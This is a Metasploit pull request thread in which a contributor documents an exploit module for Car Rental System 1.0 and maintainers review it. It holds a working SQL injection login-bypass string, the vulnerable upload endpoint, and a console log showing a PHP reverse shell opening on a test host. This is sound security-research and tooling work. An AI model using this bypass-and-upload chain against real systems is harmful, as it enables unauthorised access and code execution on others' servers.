Car Rental System 1.0 Exploit
rapid7/metasploit-framework pull request #15397
Opened 2021-07-06 16:05 UTC by foxlox

## Vulnerable Application

Car Rental System 1.0 is a Web Application to rent cars. It was write using PHP and MySQL.

Vendor Homepage: https://www.sourcecodester.com/php/14544/car-rental-management-system-using-phpmysqli-source-code.html
Software Link: https://www.sourcecodester.com/download-code?nid=14544&title=Car+Rental+Management+System+using+PHP%2FMySQLi+with+Source+Code

to install, extract all files in a web directory, edit admin/db_connect.php, and create database following database/car_rental_db.sql

Opening the web page, we can login in /admin area using " ' OR 1=1 limit 1# " as username, and a random word as password; Giving "limit 1" we will select the first user: ADMIN

This software is also vulnerable for Arbitrary File Upload.

Vulnerable page: http://IP/Car_CMSHOME/admin/index.php?page=manage_car. Editing a Car record, you may upload a php file.

## Verification Steps

Confirm that functionality works:
1. Start `msfconsole`
2. `use exploit/multi/php/car_rental_system`
3. Set the `RHOST`.
4. Set the `TARGETURI`.
7. Set `LHOST` and `LPORT`
8. Run the exploit: `run`
9. Confirm you have now a reverse shell

**TARGETURI**
The path to the Car Rental System HOME directory.

## Scenarios

### Debian 10 running Apache2 and php7.3

```
msf6 exploit(multi/php/car_rental_system) > use exploit/multi/php/car_rental_system
[*] Using configured payload php/reverse_php
msf6 exploit(multi/php/car_rental_system) > set RHOSTS 192.168.0.130
RHOSTS => 192.168.0.130
msf6 exploit(multi/php/car_rental_system) > set TARGETURI /car_rental/
TARGETURI => /car_rental/
msf6 exploit(multi/php/car_rental_system) > set LHOST eth0
LHOST => eth0
msf6 exploit(multi/php/car_rental_system) > exploit -j
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 192.168.0.114:4444 
[*] Attempting Login
msf6 exploit(multi/php/car_rental_system) > [*] Cookie: PHPSESSID=uokk0ufj0ujbphrte03upmsej7;
[*] Creating new car
[*] Last Images inserted id=6
[*] index.php?page=manage_car&id=6
[*] assets/uploads/cars_img/1605195300_sh_ell.php
[*] Command shell session 1 opened (192.168.0.114:4444 -> 192.168.0.130:56876) at 2020-11-12 16:34:58 +0100
msf6 exploit(multi/php/car_rental_system) > 
msf6 exploit(multi/php/car_rental_system) > sessions 

Active sessions
===============

  Id  Name  Type           Information  Connection
  --  ----  ----           -----------  ----------
  1         shell php/php               192.168.0.114:4444 -> 192.168.0.130:56876 (192.168.0.130)

msf6 exploit(multi/php/car_rental_system) > sessions 1
[*] Starting interaction with 1...

id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

uname -a
Linux 6784e50e1781 4.19.0-11-amd64 #1 SMP Debian 4.19.146-1 (2020-09-17) x86_64 GNU/Linux

```

2021-07-06 16:26 UTC, foxlox commented
This is the working exploit for Rental Car System 1.0. Proof of working in attached video
[car_rental_1.0_exploit.mp4.zip](https://github.com/rapid7/metasploit-framework/files/6771390/car_rental_1.0_exploit.mp4.zip)

2021-07-07 15:37 UTC, gwillcox-r7 requested changes

2021-07-07 15:37 UTC, gwillcox-r7 commented on modules/exploits/multi/php/car_rental_system.rb
> +    php << "?>\n"
Why do this? Can't you just generate a normal PHP shell using the built in mixins? This completely defeats the purpose of having the Metasploit Framework as every time you set the `PAYLOAD` option in the console, absolutely nothing will change as you are never using `payload` or more specifically `payload.encoded` anywhere in your code.

2021-07-07 15:37 UTC, gwillcox-r7 commented on modules/exploits/multi/php/car_rental_system.rb
> +        OptString.new('PASSWORD', [true, 'The Password for Car Rental', 'moana']),
If this is going to be an SQL injection is there a reason why the `USERNAME` should be a configurable option? Also assuming this is an SQL injection it shouldn't matter what you set as the `PASSWORD` value. It would probably be better to not allow the user to set these options if you plan to bypass authentication via SQL injection.

2021-07-07 15:37 UTC, gwillcox-r7 commented on modules/exploits/multi/php/car_rental_system.rb
> +        'Name' => 'Car Rental System 1.0 reverse shell',
Yeah, this shouldn't always be a reverse shell, and this title should describe what your exploiting. In this case it appears to be a SQL injection for authentication bypass followed by an arbitrary file upload vulnerability.

2021-07-07 15:37 UTC, gwillcox-r7 commented on modules/exploits/multi/php/car_rental_system.rb
> +          Car Rental System CMS 1.0, this module exploits a vulnerabilit, which allows to enter Admin page with SQL injection, and upload a PHP file and run a reverse shell.
This description contains typos and is not descriptive enough. Which page contains the SQL injection? What parameter? What permissions do you get when you run the PHP script? Code execution as `nobody`? Code execution as `root`? Its hard to tell what the full impact of this vulnerability is and what pages are affected from this description.

2021-07-07 15:37 UTC, gwillcox-r7 commented on modules/exploits/multi/php/car_rental_system.rb
> +      )
Hmm so I'm not seeing the `Notes` section here. See https://github.com/rapid7/metasploit-framework/wiki/Definition-of-Module-Reliability,-Side-Effects,-and-Stability for more info.

2021-07-07 15:37 UTC, gwillcox-r7 commented on modules/exploits/multi/php/car_rental_system.rb
> +    return res.get_cookies
`res` could be `nil` here if the server doesn't respond, so you should check things before trying to call `.get_cookies()`.

2021-07-07 15:37 UTC, gwillcox-r7 commented on modules/exploits/multi/php/car_rental_system.rb
> +    inject_request(cookie)
Server could respond, but not send any cookies, so you should check that `cookie` actually contains data and is not empty or `nil` before calling `inject_request(cookie)`

2021-07-07 15:37 UTC, gwillcox-r7 commented on modules/exploits/multi/php/car_rental_system.rb
> +    did = get_id(cookie)
Perhaps not the best name for the variable as this may be confused for the word `did`, may want to consider a more descriptive name here but this is just a suggestion.

2021-07-07 15:37 UTC, gwillcox-r7 commented on modules/exploits/multi/php/car_rental_system.rb
> +
Why print out that your cleaning the environment when you don't end up actually doing anything at this stage? If you wanted to remove the file from the target after your sessions you could call `register_file_for_cleanup(<location on disk of the uploaded shell>)`.

Also the second output `Send a command to test` is not helpful for connecting to the shell and once you end up using `payload.encoded` the framework should automatically connect to the shell anyway so this line doesn't make much sense in that context.

2021-07-07 15:37 UTC, gwillcox-r7 commented on modules/exploits/multi/php/car_rental_system.rb
> +  end
This seems very hacky and given that you aren't using `payload.encoded` I would remove it for now as this code is never going to get executed with the way this code is currently coded.

2021-07-07 15:37 UTC, gwillcox-r7 commented on documentation/modules/exploit/multi/php/car_rental_system.md
> +Car Rental System 1.0 is a Web Application to rent cars. It was write using PHP and MySQL.
```suggestion
Car Rental System 1.0 is a web application that allows users to rent cars using an online portal. It was written using PHP and MySQL.
```

2021-07-07 15:37 UTC, gwillcox-r7 commented on documentation/modules/exploit/multi/php/car_rental_system.md
> +to install, extract all files in a web directory, edit admin/db_connect.php, and create database following database/car_rental_db.sql
```suggestion
To install Car Rental System 1.0, extract all files from the software link above into a web directory, edit admin/db_connect.php, and create database following database/car_rental_db.sql
```
Made a slight suggestion above but these directions aren't clear enough. What changes need to be made to `admin/db_connect.php`? Also if you have directions for creating the database you should list them here.

2021-07-07 15:37 UTC, gwillcox-r7 commented on documentation/modules/exploit/multi/php/car_rental_system.md
> +Opening the web page, we can login in /admin area using " ' OR 1=1 limit 1# " as username, and a random word as password; Giving "limit 1" we will select the first user: ADMIN
This is way too long of a line, and we are in markdown so backticks will work to highlight things as code which is preferred vs double quotes:

```suggestion
Users can log into the app as an administrator by using the username ` ' OR 1=1 limit 1#` , 
and a random word as password. `limit 1` is used as it ensures the database will select the first
user in the database, ADMIN, thereby logging the attacker in as the administrative user.
```

2021-07-07 15:37 UTC, gwillcox-r7 commented on documentation/modules/exploit/multi/php/car_rental_system.md
> +Vulnerable page: http://IP/Car_CMSHOME/admin/index.php?page=manage_car. Editing a Car record, you may upload a php file.
This doesn't really describe things properly. Let me show you how I would explain this a bit better:

```suggestion
Once authenticated as an administrator, attackers can then upload arbitrary files via the `/admin/ajax.php?action=save_car` page, which will then be placed under the `/admin/` directory on the web server. By uploading
an executing a malicious PHP file, attackers can gain arbitrary code execution on the web server as the `www-data` user.
```

2021-07-07 15:37 UTC, gwillcox-r7 commented on documentation/modules/exploit/multi/php/car_rental_system.md
> +9. Confirm you have now a reverse shell
```suggestion
9. Confirm that you now have a shell on the target machine as the `www-data` user.
```

2021-07-08 06:24 UTC, foxlox commented on modules/exploits/multi/php/car_rental_system.rb
> +        OptString.new('PASSWORD', [true, 'The Password for Car Rental', 'moana']),
you're right obviuosly... I'll remove 54 and 55

2021-07-08 06:24 UTC, foxlox commented on modules/exploits/multi/php/car_rental_system.rb
> +    # print(normalize_uri(target_uri.path, 'admin', 'index.php?page=manage_car&id='+(did)))
sure I'll remove 114

2021-07-08 06:38 UTC, foxlox commented
Thanks @gwillcox-r7  I'll be working on it this weekend.

2021-07-08 13:56 UTC, smcintyre-r7 requested changes

2021-07-08 13:56 UTC, smcintyre-r7 commented on documentation/modules/exploit/multi/php/car_rental_system.md
> +
Options should use the markdown header not bold. The extra blank line can be removed as well.

```suggestion
### TARGETURI
The path to the Car Rental System HOME directory.
```

2021-07-08 13:56 UTC, smcintyre-r7 commented on modules/exploits/multi/php/car_rental_system.rb
> +            'Jyotsna Adhana and Saurav Shukla', # Discovery
Can you please list each author individually?
```suggestion
            'Jyotsna Adhana', # Discovery
            'Saurav Shukla',  # Discovery
```

2021-07-08 13:56 UTC, smcintyre-r7 commented on modules/exploits/multi/php/car_rental_system.rb
> +          'PrependMigrate' => true,
This option isn't relevant because PHP payloads don't support migrating. That's a Windows Meterpreter exclusive feature.

2021-07-08 13:56 UTC, smcintyre-r7 commented on modules/exploits/multi/php/car_rental_system.rb
> +        OptString.new('PAYLOAD', [true, 'Payload', 'php/reverse_php'])
This should be updated to use a PHP payload generated by Metasploit and selected by the user. That would allow them to deliver say a Meterpreter payload for example.

2021-07-08 13:56 UTC, smcintyre-r7 commented on modules/exploits/multi/php/car_rental_system.rb
> +    data_id = res.body.to_s.index('data-id=')
`res` should be checked if it's `nil` here as well.

2021-07-08 13:56 UTC, smcintyre-r7 commented on modules/exploits/multi/php/car_rental_system.rb
> +    ]
This option isn't referenced anywhere, so it doesn't appear to be necessary. It's typically used by the `AutoCheck` mixin which isn't used here since there's no check method.

2021-07-08 13:56 UTC, smcintyre-r7 commented on modules/exploits/multi/php/car_rental_system.rb
> +    data.add_part('0', nil, nil, 'form-data; name="qty"')
Can these fields be randomized as well or do the IDs have to be these particular values?

2021-08-02 20:53 UTC, gwillcox-r7 commented
Hi @foxlox any updates on this PR? We are still waiting on a few changes from you.

2021-09-07 19:09 UTC, gwillcox-r7 commented
Going to close this PR out an attic it as we are still awaiting a few instructions on questions on setting up this PR and there are a number of outstanding comments that we need further feedback on. If you get time @foxlox please answer and fix the outstanding  questions and we can consider reopening this again.

Adding the `attic` label for now.

2021-09-07 19:09 UTC, closed without merging